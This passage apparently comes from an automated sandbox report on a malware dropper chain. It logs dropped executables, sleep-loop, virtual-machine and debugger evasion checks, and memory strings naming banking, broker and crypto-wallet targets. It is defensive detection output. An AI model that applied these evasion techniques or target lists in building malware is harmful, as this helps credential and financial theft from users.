Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\is-O04L0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\is-IKU3H.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\libeay32.dll (copy) Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\ssleay32.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\msvcp71.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\msvcr71.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\uninstall\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\Qt5OpenGL.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\is-86R9G.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\is-5ANFC.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\is-IVTOI.tmp Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1u2wN0W4Z43Z310SAYDV85NF4w4\Bunifu_UI_v1.5.3.dll Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1u2wN0W4Z43Z310SAYDV85NF4w4\Y-Cleaner.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\soft[1] Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\libssl-1_1.dll (copy) Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\dll[1] Jump to dropped file
Found evasive API chain (date check)
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Evasive API call chain: GetSystemTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe API coverage: 9.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7564 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe TID: 6988 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe TID: 8060 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe TID: 3348 Thread sleep count: 56 > 30
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe TID: 3348 Thread sleep time: -3360000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3892 Thread sleep count: 1186 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3892 Thread sleep count: 318 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1864 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 604 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3124 Thread sleep count: 651 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep count: 42 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 316 Thread sleep count: 92 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3240 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5812 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe File opened: PhysicalDrive0 Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00540A25 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 3_2_00540A25
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_0040553A FindFirstFileA, 8_2_0040553A
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, 8_2_004055DE
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0041E01D FindFirstFileExW, 9_2_0041E01D
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_10007EA9 FindFirstFileExW, 9_2_10007EA9
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020DE284 FindFirstFileExW, 9_2_020DE284
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00452A4C FindFirstFileA,GetLastError, 11_2_00452A4C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004751F8 FindFirstFileA,FindNextFileA,FindClose, 11_2_004751F8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 11_2_00464048
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 11_2_004644C4
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00462ABC FindFirstFileA,FindNextFileA,FindClose, 11_2_00462ABC
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 11_2_00497A74
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 7_2_00409B30
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user Jump to behavior
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696497155j
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe Binary or memory string: VMware
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000002.2339117587.000000000152E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(FX
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000111D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.00000000010DA000.00000004.00000020.00020000.00000000.sdmp, G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1691472183.0000000001574000.00000004.00000020.00020000.00000000.sdmp, G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000002.2339117587.0000000001574000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B61000.00000004.00000020.00020000.00000000.sdmp, playglock32x64.exe, 0000000D.00000002.2679705676.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, playglock32x64.exe, 0000000D.00000002.2679705676.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000002.1779130970.00000000026B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000002.1779130970.0000000002678000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000003.1768755104.00000000026B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2102544836.000000000055A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp`
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW'0'
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696497155o
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000000.1571265793.00000000013E2000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: !d->m_output_flush_remainingd->m_pOutput_buf < d->m_pOutput_buf_endmax_match_len <= TDEFL_MAX_MATCH_LEN(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)d->m_lookahead_size >= len_to_movevisaSpellingProtectSpeechReadyForiTop PDFCiscoSparkLauncherWebExCiscoSparkdotnetEvent ViewerF12BlendBaiduHP_Easy_StartSmartSteamEmuBrowserCacheseeedwodlholdhodlSketchUpbandlab-assistantvlcPixelSeeCLR_v4.0CLR_v2.0_32webCachesHoYoversepocopedaTwitch StudioWebTorrentLibrarymopnmbcafieddcagagdcbnhejhlodfddbhhhlbepdkbapadjdnnojkbgioiodbicopcgpfmipidbgpenhmajoajpbobppdilnngceckbapebfimnlniiiahkandclblbVsGraphicsWindowsAppsvshubWindows Sidebaroptimization_guide_prediction_model_downloadsUXP.android.cache.gradleVALORANTNichromeMetroOpenOfficeVodafoneClickUpDATAparkXiaomiDevice MetadataWindows Live ContactsWindows StorecacheCommsConnectedDevicesPlatformaddonscachesLocal StorageAugLoopMcAfee_Inclinknowmt-center.chiadaoexporttokenWorldOfTanksWargaming.netPlay GamesAutoItVirtualBoxreposiCloudDriveVMwareFree_PDF_SolutionsLenovoServiceBridgeMega LimitedMEGAsyncLogiShrd@
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763288306.00000000010ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2102544836.0000000000588000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1762556798.0000000000CAA000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: main.YFHiCIiixcqEmuOlForkRgsVMgLNXhAujTFmOcP
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696497155f
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696497155s
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1762556798.0000000000CAA000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: main.xVFDfAARqjMemLyUDOzhCyJqReWzzAWruHqqEmUwOjMGu
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018FC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ymECWhxYrkkpjnZlrjPDSzJkDiTLdWCcvWIdBkmFQkjZElBIRukKygZKZdJqigldpvMCicgGyjGEvQVcW
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00553DC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00553DC0
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00402940 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 9_2_00402940
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 8_2_00418320
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00432FE0 mov eax, dword ptr fs:[00000030h] 3_2_00432FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00432FE0 mov eax, dword ptr fs:[00000030h] 3_2_00432FE0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0041487F mov eax, dword ptr fs:[00000030h] 9_2_0041487F
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0041B509 mov eax, dword ptr fs:[00000030h] 9_2_0041B509
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_10007A76 mov eax, dword ptr fs:[00000030h] 9_2_10007A76
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_10005F25 mov eax, dword ptr fs:[00000030h] 9_2_10005F25
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004B27AC push dword ptr fs:[00000030h] 9_2_004B27AC
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020D4AE6 mov eax, dword ptr fs:[00000030h] 9_2_020D4AE6
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020C092B mov eax, dword ptr fs:[00000030h] 9_2_020C092B
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020DB770 mov eax, dword ptr fs:[00000030h] 9_2_020DB770
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020C0D90 mov eax, dword ptr fs:[00000030h] 9_2_020C0D90
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0050CDF0 lstrlenA,GetProcessHeap,HeapAlloc,lstrcpynA, 3_2_0050CDF0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0053FB45 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0053FB45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00553DC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00553DC0
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_0041584A SetUnhandledExceptionFilter, 8_2_0041584A
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_0041585C SetUnhandledExceptionFilter, 8_2_0041585C
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0040C986 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_0040C986
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0040D3A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_0040D3A5
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00410D6B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00410D6B
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0040D539 SetUnhandledExceptionFilter, 9_2_0040D539
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10002ADF
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_100056A0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_10002FDA
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020CCBED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_020CCBED
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020CD60C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_020CD60C
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020CD7A0 SetUnhandledExceptionFilter, 9_2_020CD7A0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020D0FD2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_020D0FD2
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: file.exe, Program.cs Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
